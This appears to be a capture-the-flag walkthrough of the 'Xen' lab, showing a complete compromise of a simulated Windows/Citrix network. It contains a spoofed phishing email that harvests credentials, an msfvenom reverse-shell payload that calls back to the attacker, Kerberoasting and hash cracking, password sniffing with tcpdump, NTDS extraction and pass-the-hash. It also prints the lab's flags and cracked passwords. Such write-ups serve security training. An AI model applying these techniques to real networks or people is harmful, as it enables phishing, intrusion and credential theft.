SF:20RCPT\x20RSET\x20SAML\x20TURN\x20VRFY\r\n")%r(GenericLines,6F,"220\x20
SF:ESMTP\x20MAIL\x20Service\x20ready\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x2
SF:0Bad\x20sequence\x20of\x20commands\r\n503\x20Bad\x20sequence\x20of\x20c
SF:ommands\r\n")%r(GetRequest,6F,"220\x20ESMTP\x20MAIL\x20Service\x20ready
SF:\x20\(EXCHANGE\.HTB\.LOCAL\)\r\n503\x20Bad\x20sequence\x20of\x20command
SF:s\r\n503\x20Bad\x20sequence\x20of\x20commands\r\n");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: specialized|general purpose|phone
Running (JUST GUESSING): Microsoft Windows 7|8|Phone|2008|8.1|Vista (91%)
OS CPE: cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8 cpe:/o:microsoft:windows cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_8.1 cpe:/o:microsoft:windows_vista::- cpe:/o:microsoft:windows_vista::sp1
Aggressive OS guesses: Microsoft Windows Embedded Standard 7 (91%), Microsoft Windows 8.1 Update 1 (91%), Microsoft Windows Phone 7.5 or 8.0 (91%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 (90%), Microsoft Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 or Windows 8.1 (90%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (90%), Microsoft Windows 7 (90%), Microsoft Windows 7 Professional or Windows 8 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 8s, deviation: 0s, median: 8s

TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 24.00 ms 10.14.14.1
2 24.00 ms humongousretail.com (10.13.38.12)

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 60.99 seconds

E:\PENTEST>

It seems we have HTTP and HTTPS on port 80 and 443, and SMTP on 25.

Overview of Web Services

Let’s take a quick look at the webpages to see what we have. I got the following on port 80, which redirected me to port 443, the certificate for the site provided and a new domain of hunongousretail.com.

I didn’t have much to go on, so I decided to do some directory enumeration.

Directory Enumeration

I used wfuzz in this case because gobuster didn’t come up with anything useful. wfuzz –hc 404 -w raft-small-words.txt http://10.13.38.12/FUZZ

Web Directories

We had several other directories that seemed interesting but the ones I wanted to look at are Remote and Jakarta.

Opening the https://hunongousretail.com/remote, I get the following.

And browsing https://hunongousretail.com/jakarta, I got the following.

I had a look at these for some time to see if I could come up with anything useful, I looked deeper into the directories and for known exploits for the XenAPP application.  Knowing this environment is called XEN, I decided to concentrate my efforts on the remote directory, rather than the Jakarta.  After spending some more time on this, I decided to investigate the SMTP service. I had done examples in the past where the users were very responsive.

SMTP Enumeration

I had the domain name of the company, therefore I decided to see if I could get any email addresses and see if I could somehow get a response from someone. smtp-user-enum -M RCPT -U ./usernames.txt -D humongousretail.com -t 10.13.38.12

I had found 4 addresses;

  • sales@humongousretail.com
  • it@humongousretail.com
  • marketing@humongousretail.com
  • legal@humongousretail.com

Now that I had these 4 addresses, I needed to ensure that I could send mail through.  I decided to use an internal address to try and get a response from someone.

User Response

To see if I was getting a response, I had a listener running to capture anything that may come through.

nc -nlvp 80

I then attempted a lot of different emails and a lot of different subjects.  I eventually got a hit with the subject of Remote.  My thoughts on this was to try and get the users to click on my link.  My thoughts were as follows;

telnet 10.13.38.12 25 helo humongousretail.com

MAIL FROM: it@hunongousretail.com

RCPT TO: sales@humongousretail.com

DATA Subject: Remote Portal Hi, The URL for the remote portal has now been changed to http://10.14.15.106 Regards

IT QUIT

I chose to do this because a mail from the IT department sent out to a group of people would hopefully get me something.  The users should trust an email coming in from IT, or so you would think.

Once the email had been sent, I didn’t get a response, but 30 seconds later, I had some data returned.  It was the user clicking on the link to the new portal and providing their credentials.

I had a username of pmorgan and a password of Summer1Summer!.  Although I knew that had worked, I tried again to ensure I had it correctly, and had a different user response.

I now had another user. This one being jmendes and password VivaBARC3L0N@!!!.

I kept this up to see if I could get any more responses and I had one more.

The last response I had gave me the user awardel and password @M3m3ntoM0ri@. I had 3 users

pmorgan:Summer1Summer! jmendes: VivaBARC3L0N@!!! awardel:@M3m3ntoM0ri@

Citrix XenAPP

I had the 3 users and knew that they must work somewhere.  I browsed to the remote site and entered the credentials of pmorgan

And I now had access to a desktop.

I tried this for each user that I had and each of the worked and successfully logged in.

I clicked on the Desktop to access and and was asked to open the launch.ica file which was defaulted to open with the Citrix Receiver Engine. after i installed icaclientWeb_19.12.0.19_amd64.deb on kali

Once I had click ok, I was presented with a Desktop.  I browsed to the Desktop of the user and I was presented with the 1st flag.

1 – XEN{wh0_n33d5_2f@?} Breach

Gaining a shell

Now that I had access to the desktops, I wanted to get a shell to see if I could elevate my privileges them.  I first made a note off all the users and desktops they were assigned to

I created the reverse shell that I wanted so that I could get a meterpreter session.

msfvenom –platform windows -p windows/meterpreter/reverse_tcp LHOST=10.14.15.106 LPORT=10086 -f exe x86exploit.exe

I then proceeded to setup m msfconsole as follows.

 

Now that I had everything setup, I started the SimpleHTTPServer so that I could download the file necessary to exploit the system.

python -m SimpleHTTPServer 80

I then browsed to my machine on the vdesktop and downloaded the file.

I now started the exploit and got a meterpreter shell.

Privilege Escalation on Desktop

Now that I had a meterpreter shell, I wanted to see if I could elevate my privileges.  I decided to use the local exploit suggester.

I first put my session to the background and started the suggester. use post/multi/recon/local_exploit_suggester

Seeing the results from the suggester, I decided on using the always install elevated exploit. use exploit/windows/local/always_install_elevated

I had successfully raised my privileges.  I looked to see what was on the Administrator Desktop, and I had found the second flag.

2 – XEN{7ru573d_1n574ll3r5} Deploy

Further Enumeration

Now that I had a way into the inside of the network, I saw the internal network as 172.16.249.0/24, I wanted to perform a quick scan of the network to identify hosts. To pivot within the internal network, I used a socks proxy within msf. use auxiliary/server/socks4a

Now that I had done this, I wanted to see what hosts were live on the internal network.  Knowing the IP’s of the desktops, I chose to only scan a small range.  I wanted to scan between 199 and 210.

I managed to get an additional 3 IP’s.

  • 172.16.249.200 (DC)
  • 172.16.249.201 (Citrix)
  • 172.16.249.202 (NetScaler)

Because of this, I decided to use a technique I had used in a previous engagement called Kerberoasting.

With the system shell that I had earlier, I decided to upload the Kerberoasting module.

Further credentials

I now wanted to see if there were any further credentials that I could find

PS C:\Users\pmorgan\Desktop> .\Rubeus.exe kerberoast /outfile:service_ticket.txt


______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/

v1.4.2


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Searching the current domain for Kerberoastable users

[*] Found 1 user(s) to Kerberoast!

[*] SamAccountName : mturner
[*] DistinguishedName : CN=Mark Turner,OU=Contractors,DC=htb,DC=local
[*] ServicePrincipalName : MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash written to C:\Users\pmorgan\Desktop\service_ticket.txt

[*] Roasted hashes written to : C:\Users\pmorgan\Desktop\service_ticket.txt
PS C:\Users\pmorgan\Desktop> dir


Directory: C:\Users\pmorgan\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a--- 4/4/2020 11:13 AM 7 cmd.bat
-ar-- 4/6/2019 11:11 PM 19 flag.txt
-a--- 2/20/2020 6:53 PM 41534 Invoke-Portscan.ps1
-a--- 3/26/2020 10:56 AM 16128568 netscan64.exe
-a--- 4/6/2020 8:57 PM 295 netscan64.lic
-a--- 4/6/2020 8:57 PM 39301 netscan64.xml
-a--- 2/20/2020 6:30 PM 770279 powerview-dev.ps1
-a--- 9/22/2019 10:20 AM 883600 putty.exe
-a--- 11/27/2019 2:17 PM 198144 Rubeus.exe
-a--- 4/6/2020 9:12 PM 2172 service_ticket.txt
-a--- 3/28/2020 11:17 AM 832512 SharpHound.exe
-a--- 3/28/2020 11:17 AM 973323 SharpHound.ps1
-a--- 4/6/2020 8:59 PM 32665 winPEAS.bat
-a--- 4/6/2020 8:59 PM 241152 winPEAS.exe

[to get a proper command prompt we us]
PS C:\Users\pmorgan\Desktop> type cmd.cmd
cmd.exe

PS C:\Users\pmorgan\Desktop> type service_ticket.txt 
$krb5tgs$23$*mturner$htb.local$MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433*$107F90C880956CA6ABBBAB4F9C2FB71B$15B748ACB9F233974753E8F01B946449197403730D59DB4B2D72E600B8C7AC5D3178F52A1C5562A1146824D2F33756CBF95D70EAC796B6F1D006FF6CF3DC1D1EA05B6E9839D67AA634F7B0FD24C1CE69F7CE49B5314CCFA49D074BEA3A457E5EEA9F91822E7F1676439ED137A54E5ADF1546A6AB5CA3B808EECC77A5F2E94880B39457CD714425340EA8DFE186B9A90BE5C541D990C6C7E0C82F95043A81DC85DF709CF7E45151B022EA8275C4ED2F0578F9462847F9E1CF21BEFBA5FB187A810DFAD7D2D62C04785842CBD44BB1B8AA94E9D9EFA691A8FF54392210C635E8B004C42E4F71EFF3EC30599A33F1F434A1705FF4378E553071A6A974FB58569CCFDE795E39492AD893BDBF55916EA6763D63C1CF476ABA8FC24790F8954C80B5503147681BDA02EB8A9DDE56DE33A266851AFC99E72A6E08C5CA6BD127EC9AAA3BD3AE026E94BD481FF3583A28C9A3CF408110C4FF8551A27E615A15F0125AAB8761E8D5B1DA35858BE845D031F253E46EBE6987A94D1A8848820511226F95C4F0E27798E575F179C06EBB12C76EEAFD4CA977E085A392B06EB805033A229C26504AA8EB871041346DAB4B92D5400B030C6CFA0EE853656F4AAAF857F04B30D0BF7376B37634CE0DD3D82B78A3005E5C3E174915960674AE255995A3B37AFC82944D87920BE43302DFF9EAC0D559298D943FAFFBA118DA31688858C415342B729949B6366B07F3A8AD9B3B310A73EB689C38A087C4E05D9917DC46E01B25C808B7A3F93449E1E5CD7CA02018EA77DD3E339BDDF6ACF4CCC991BDAFB45E9809F9C12CF9358C5D07ABFA105E90206EE59B7ED6D5161BA186AF275AEC9B046B0E600585750BC259FA108CD62A0CFF191F4A30EFEE4BAFECCE07F3BAC3A22055672F4E761D220D5F8E1CB4BD51FA5BDCC8CDA524A709A389A31E913174455592CE322BFD32E572A7DF97C599E05CC3771A4FA952B9C34B273AD284DF237187EDCEAF2922AFBE3C4927E67B2B5FEA3F9AB57AD47436031EDB5A8D4C5D31FACF307E8CAAD66D61D6760CA3B9A4EDF10B0F6315B9D3FA7F7118EC6AA446F4642883D7DAF016CB4F7F8F3DB305AD0F6CB087FA149B4C439EE164B6B809EFD1A2FABDD115D77B1371B06968C8E6479BFB94C51763EE71A064D445D28FE30EF81EE3FDDF437C495305913C30F4B99E749187F1C09DD3DC10DD39B23AD5A84BE8CA906D3C01770CD71291FBC43D3D2A61E0DBD651106BFE97B6F2DFFF1A70F0BC825BD68D3B791CD67211162BA7C021D606FA0AD46175FF04E785607F186885802F0305F04876A5657CE9DB0BAECEBA1F2593DC7C8B70B295DE3D0F47201CD149232DCBB303853A4042677C96F9E286A06A8AB54F3FAAE0B3DCF2D92D76F511FB11492364C8AF22AC6F0462E039D66F74025BB76BC870B94388D69FD1295DF592C6205B8871BD55FCC5429EDCB690719836

PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\SharpHound.ps1" .
PS C:\Users\pmorgan\Desktop> Set-ExecutionPolicy -Scope CurrentUser
PS C:\Users\pmorgan\Desktop> Bypass
PS C:\Users\pmorgan\Desktop> .\Sharphound
PS C:\Users\pmorgan\Desktop> Import-Module .\SharpHound.ps1
PS C:\Users\pmorgan\Desktop> get-help Invoke-BloodHound
PS C:\Users\pmorgan\Desktop> Invoke-BloodHound -CollectionMethod All
PS C:\Users\pmorgan\Desktop> copy .\service_ticket.txt \\Client\D$\
PS C:\Users\pmorgan\Desktop> copy "\\Client\D$\netscan64.exe" .
PS C:\Users\pmorgan\Desktop>
PS C:\Users\pmorgan\Desktop> Import-Module .\powerview-dev.ps1
PS C:\Users\pmorgan\Desktop> Get-NetUser
PS C:\Users\pmorgan\Desktop> Get-NetUser | Ft samAccountName

I copied the contents of this token to a file named mturner so that I could now run this through hashcat.

I exhausted all password lists that I had with this and decided to look up some hashcat rules online to see what I could come up with.  I eventually came up with a ruleset that had potential which was found at https://github.com/NSAKEY/nsarules.git.

hashcat  -m 13100 ./mturner rockyou.txt rules/_NSAKEY.v2.dive.rule –debug-mode=1 –debugfile=matched.rule –force -0

After several hours, I eventually got a hit on the password.

We now know that the password for mturner is 4install!

SMB Access

Now that I had the new credentials I looked about a little more to see what else I could find.  I eventually found SMB on 172.16.249.201 and decided to use the credentials found to see if I could see anything. proxychains smbmap -u mturner -p ‘4install!’ -d htb.local -H 172.16.249.201

This showed that we had access to read the files locate in the Citrix$ folder.  I connected to this to see what was inside the folder with smbclient tools.

proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local

I was provided with some interesting files. The 2 of interest at this point are flag.txt and private.ppk.

I downloaded these file and was able to read the next flag.

3 – XEN{l364cy_5pn5_ftw} Ghost

Putty file Conversion

Now that I had a putty private key file, I had a look at its contents to see if I could get a hint at anything.

It seems this could be used in putty but has a password on it too.  I needed to try and crack the password on this before I could proceed.  I decided to convert this with putty2john. putty2john private.ppk > private.hash

Now that I had this file in a readable format for john, I tried to crack the password.

After several hours, all my password lists came up empty.  I was unable to crack the password with what I had.  I decided to look elsewhere to see what I could potentially use as a password list generator.  I found a password generator that seemed interesting and decided to run with it.  I found this at https://github.com/hashcat/kwprocessor 

./kwp -o passes basechars/tiny.base keymaps/en-gb.keymap routes/2-to-32-max-5-directionchanges.route

 

Once I had the password list generated, I then had to put it through john to try and crack it again. john -w=./passes private.hash

Now that I knew the password for the file, I could now convert the file for use with my system.  To do this, I used puttygen. puttygen private.ppk -O private-openssh -o id_rsa

I now had a key file that I could use.

Access to NetScaler

During the time gathering information, I had accumulated many user id’s and I tried all of them with the private key to get onto the SSH of the NetScaler.  I then quickly found the default username of the devices is nsroot.  I then attempted to login with this user id. proxychains ssh -i id_rsa nsroot@172.16.249.202

Now that I had access to the NetScaler as root of the device, I hunted around to see if I could find anything.  After a while of searching, I did not come up with anything useful.  Remembering that the device is essentially a firewall and router, I decided to listen to the traffic passing through the device and remembered a specific article at https://hackertarget.com/tcpdumpexamples/.

I attempted this to see if I would get any results. tcpdump -s 0 -A -n -l | egrep -I “POST /|pwd=|passwd=|password=|Host:”

 

4 – XEN{bu7_ld4p5_15_4_h455l3} Camouflage

LDAP

Knowing that I had access to this box as root, I wanted to perform some additional test to see what other potential traffic was being passed through it.  The previous flag seemed to suggest ldap could be being used. I set up a tcpdump to capture this for me. tcpdump -w capture.pcap

I now had to transfer the file back to my machine for investigation.  I used scp for this.

proxychains scp -i id_rsa nsroot@172.16.249.202:/root/capture.pcap .

I then opened this file within Wireshark to see what I could find.

Now going from the previous hint, I searched for the LDAP traffic and found a password.

The password that I had found was #S3rvice#@cc which was for the netscaler-svc account.

msf > use auxiliary/server/socks4a
msf > set srvport 8888
msf > route add 172.16.249.0 255.255.255.0 1
msf exploit
root@kali:~/htb/xen# proxychains GetUserSPNs.py -request -dc-ip 172.16.249.200 HTB.LOCAL/netscaler-svc:#S3rvice#@cc
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:389-<><>-OK
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon 
---------------------------------- ------- --------------------------------------- -------------------------- --------------------------
MSSQLSvc/CITRIXTEST.HTB.LOCAL:1433 mturner CN=Deployment,OU=Groups,DC=htb,DC=local 2019-02-13 23:23:48.796612 2019-04-10 22:14:57.105936

|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
|S-chain|-<>-127.0.0.1:8888-<><>-172.16.249.200:88-<><>-OK
$krb5tgs$23$*mturner$HTB.LOCAL$MSSQLSvc/CITRIXTEST.HTB.LOCAL~1433*$30e2233e1b0123f3c7579d9f7a2384fb$08230b2c73edf5bc2afe0b13d494c385d67db84bc38ac830497f2e8eb1f2c148094dcd6f1cad0d26a896291119eb2a8cb196d388c568ce2348d4e69f16da74245af5298d42cf19c7958359f901d4a0f32ffb708e4ac037dd49411fce5e59ff58d6f3e184dcb7064b86c134bed4a6bf74af15875edd0800b464d3146559b62cadccd399484b4317f63aab2a9fe85ae08bfe4dece4ff25f040fa9de0c61f290670df1dd5b368a0c5b8c6e546bf547c6fbb63cb1bdf179d0eedb0ee37647a6a8e63d4a76b0e5d9f511e751cf8b4acfa4702aac9050a6e01496e4a4d26762805d950b27723d7e2a9831de5a8fdd78b8e480b16974ff4865114d74c1eee1715d5cd862afcff076f448c370c1b2ae0666770c00391c65384f525ff6f33210077e2b73cf0ae892352b3163fd0fde062e037adafbec57c705535d751efd0ecc31356cd8d933c29635107aa5add7043df5a20710a056869b872cb60203e7d7934574579837e01df2e57c580f4c6e19483c821bd5f533b378d43df50ad8fc6665bab80be7478462ccecca5208710a6b85b001ca602c2ab1920f6134ed5a59a27cd622ec2ffa6828ac4e65cb10b9d3dc5f61a50a7002ea737b41d9ffc603c0b54fe70764773468eced0d158a67ba15fe7c62083a01b447f5be2218a3ab6500378f69bacb34e6fcc1050320d9c965e75b188bf2d64ca89815b77220aa1300787e43fe9b0123447247b9ac82774c27425668d03930c48bde5cbb71d29b49d18c0473efb6a5707ca8498577b81f9a371b5fba0020699df3e0ad90566a9b366f731c98c2c1b1a454b0081aaf9d9074e69d3d0b47fcbf235b45d483bc37a0bb82f68623d6d2fd3d6bd43c2927bc713247fbcd5d492101b2b4f9b122b070897bae58d85730e5f718ad293401ea8fa9a9d691cf5e13c5187d91ed09ab4a2f5b57803e655e97145a7c0a9b371430d1f5e97e9f023f3a07ec587269758a6f2f2c2a58a2d8e61694c1950123edac23cbd9d007723d94b8542eef551a0459a50bed98f8a3d870bb8b55c2db8f12ed382fe9a4c5ed754eea8e14aa2c1b1cd15d3f2bed369071e2474eb93a0e9f9a2dfb986b25ed3459f5a956578d309fa74b6855beccdf7ba5e6facc63ebd1f6f251656b7756683582fe20e3b6cf669116df64ba68bd6beb3c09076a343f3f2b665b70d13ec65e18ddcea07bcae355517e1bdfb3bc2fc35542f08e9d29e5d1d047ecc04e4eed26bfbc8e397549820605811c7c154cfdd2650ee928d93fb770f55a84ce5ff864fbcb9e6a458f3b04c82d6d890315b0ae78227bea7ab43939d22466c27a8d8501eee6c7218dcdf772bde661302151ea644cfcc2576e8e462
root@kali:~/xen# proxychains smbmap -u mturner -p '4install!' -d htb.local -H 172.16.249.201
ProxyChains-3.1 (http://proxychains.sf.net)
[+] Finding open SMB ports....
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
[+] User SMB session establishd on 172.16.249.201...
[+] IP: 172.16.249.201:445 Name: 172.16.249.201 
Disk Permissions
---- -----------
ADMIN$ NO ACCESS
C$ NO ACCESS
Citrix$ READ ONLY
IPC$ NO ACCESS
ISOs NO ACCESS
ISOs-TEST NO ACCESS
root@kali:~/xen#
root@kali:~/xen# proxychains smbclient \\\\172.16.249.201\\Citrix$ -U htb.local\\mturner
ProxyChains-3.1 (http://proxychains.sf.net)
WARNING: The "syslog" option is deprecated
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.201:445-<><>-OK
Enter HTB.LOCAL\mturner's password: 4install!
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed May 8 18:12:51 2019
.. D 0 Wed May 8 18:12:51 2019
Deploying-XenServer-5.6.pdf A 997001 Tue Feb 12 18:21:10 2019
flag.txt AR 20 Sun Mar 31 11:25:10 2019
private.ppk A 1486 Wed May 8 18:21:51 2019
XenServer-5-6-SHG.pdf A 1747587 Tue Feb 12 18:21:32 2019

10485247 blocks of size 4096. 6344443 blocks available

Doppelganger

The term doppelganger is a non-biologically related look-alike (Wikipedia).  This provided me with the hint of looking back at the other accounts that were active on the domain.  I immediately got access to a shell again on the desktop and looked up domain details.

I was looking for what was hopefully an account that may seem to be like the found netscaler-svc account.

After all, I had tried this account in so many different places to access different resources and none were successful.

net user /domain

After a few attempts at usernames, I discovered that the backup-svc had the same password as the NetScaler password.  These essentially shared the same password.  This was out doppelganger. I then tried to login to the Domain controller using winrm and proxychains to see if I could get a successful access because I knew it was a member of the Backup Operators group which generally has access. proxychains ruby winrm_shell_with_upload.rb

 

root@kali:~/xen# proxychains ruby winrmshell2withupload.rb 
ProxyChains-3.1 (http://proxychains.sf.net)
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:5985-<><>-OK
PS htb\backup-svc@DC Documents> 
PS htb\backup-svc@DC Desktop> type flag.txt
XEN{y_5h4r3d_p@55w0Rd5?} 
PS htb\backup-svc@DC Desktop>

I looked on the Desktop of backup-svc and found the next flag.

5 – XEN{y_5h4r3d_p@55w0Rd5?} Doppelganger

Privileges

Now that I was on the box, I wanted to see what privileges I had to understand what else could be achieved with simply logging in through WinRM. whoami /priv

This was sure interesting.  It seems I had a few privileges including the Backup and Restore.  This seemed obvious though with the account being named backup-svc.

I first tried to access the Administrator Desktop and was denied access.

From this I knew something had to be done with backup privileges.  I had recently done an exercise in the office that I work in on retrieving the Active Directory Database to extract the hashes.  This is something that I do on a regular basis and therefore knew I would have to create a shadow copy of the drive to even attempt to gain access to the NTDS.

I looked at all the usual methods of creating a shadow copy including vssadmin and wbadmin.  However, I then found an article which covered doing this with diskshadow.  This was highlighted in the following document. https://github.com/decoderit/whoamipriv

Hackinparis2019/blob/master/whoamiprivParis_Split.pdf.  I wanted to try and get RDP access to the machine and therefore setup a portfwd to give me access.

portfwd add -l 3389 -r 172.16.249.200 -p 3389

I then tried to open an RDP session to the machine using remmina.

I decided to utilise this to give myself hopefully a little more access proxychains xfreerdp ipv remmina

Install freerdp-x11

sudo apt-get install freerdp-x11
root@kali:~# proxychains xfreerdp /v:172.16.249.200 /u:backup-svc 
ProxyChains-3.1 (http://proxychains.sf.net)
[03:37:43:732] [6460:6461] [INFO][com.freerdp.client.common.cmdline] - loading channelEx cliprdr
|S-chain|-<>-127.0.0.1:1080-<><>-172.16.249.200:3389-<><>-OK
Password: #S3rvice#@cc
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Local framebuffer format PIXEL_FORMAT_BGRX32
[03:37:58:008] [6460:6461] [INFO][com.freerdp.gdi] - Remote framebuffer format PIXEL_FORMAT_RGB16
[03:37:58:120] [6460:6461] [INFO][com.winpr.clipboard] - initialized POSIX local file subsystem

And I was given the RDP access I was looking for.

I now decided to run through diskshadow to see if I could create a shadow of the drive.

Shadow Copies

Diskshadow
set context persistent nowriters
add volume c: alias dmwong
create expose %dmwong% z:

Once I had created the backup, I restore this by importing the  modules found at

https://github.com/giuliano108/SeBackupPrivilege/tree/master/SeBackupPrivilegeCmdLets/bin/Deb ug.

I opened PowerShell and imported the 2 modules.

Copy-FileSebackupPrivilege z:\Windows\NTDS\ntds.dit c:\temp\ndts.dit reg save hklm\system c:\temp\system.bak

Now that I had access to these files, I continued to download them onto my system for offline cracking.

Domain Admin

Now that I had these files offline I needed to extract the hashes. python /opt/impacket/examples/secretdump.py -ntds ndts.dit -system system.bak LOCAL

This provided me with all the hashes from the Active Directory Database.  Now that I had all of these hashes, I decided to use the ‘Pass the Hash’ method to try and gain access to the Domain controller as Administrator.

proxychains python /opt/impacket/examples/wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:822601ccd7155f47cd955b94af1558be Administrator@172.16.249.200

6 – XEN{d3r1v471v3_d0m41n_4dm1n} Owned

Author – Puckiestyle